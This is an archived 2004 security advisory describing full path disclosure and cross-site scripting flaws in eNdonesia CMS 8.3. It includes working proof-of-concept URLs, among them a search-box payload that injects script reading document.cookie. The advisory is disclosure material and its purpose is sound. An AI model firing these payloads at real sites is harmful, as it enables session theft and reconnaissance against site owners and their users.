what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eNdonesiaCMS.txt

eNdonesiaCMS.txt
Posted Aug 5, 2004
Authored by y3dips | Site y3dips.echo.or.id

eNdonesia CMS version 8.3 is susceptible to full path disclosure and cross site scripting flaws.

tags | advisory, xss
SHA-256 | 60638bbb95e9a7ce651c3e384bfaaa636ff1aff85d2311db1f9d4c5907dfc386

eNdonesiaCMS.txt

Change Mirror Download


ECHO_ADV_02$2004

---------------------------------------------------------------------------
Multiple vulnerabilities in eNdonesia CMS
---------------------------------------------------------------------------

Author: y3dips
Date: August, 2th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv02-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNdonesia is a freeware content management system, written in php by Nurcholis.

Homepage: http://www.endonesia.net/

download at : http://www.sourceforge.net/projects/endonesia

Version :
tested on endonesia 8.3
not tested on other/older version but it is possible be the same

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1. - all scripts in "mod.php" files are not protected against direct access

Example:

http://localhost/endon/mod.php?mod=1

... and we will see standard php error messages, revealing full path to script:

Warning: main(./mod/1/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3

Warning: main(): Failed opening './mod/1/index.php' for inclusion \
(include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3

A2.

Example:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

... and we will see standard mysql error messages, revealing full path to script
in module because input character:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter]

warning :

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource
in /var/www/html/endon/mod/publisher/publisher.php on line 101



B. Cross-site scripting aka XSS:

eNdonesia has built-in filtering against XSS exploits, so additional measures must be used
for successful cross-site scripting.

B1 - XSS through unsanitaized user submitted variable in mod.php

http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1

POC : http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul

then the warning is

Warning: main(./mod/

test

Epublisher/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3 .

..... with "test" in <h1> format

B2. Session ID at search box

http://localhost/endon/mod.php?mod=publisher&op=search&query=

POC :

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

or in search box, input <script>alert(document.cookie)</script>

---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor not contacted yet
but i ll post it to them later

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

y3dips || echo|staff || y3dips[at]phreaker[dot]net
Homepage: http://y3dips.echo.or.id/

------------------------------[ EOF ]--------------------------------------
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close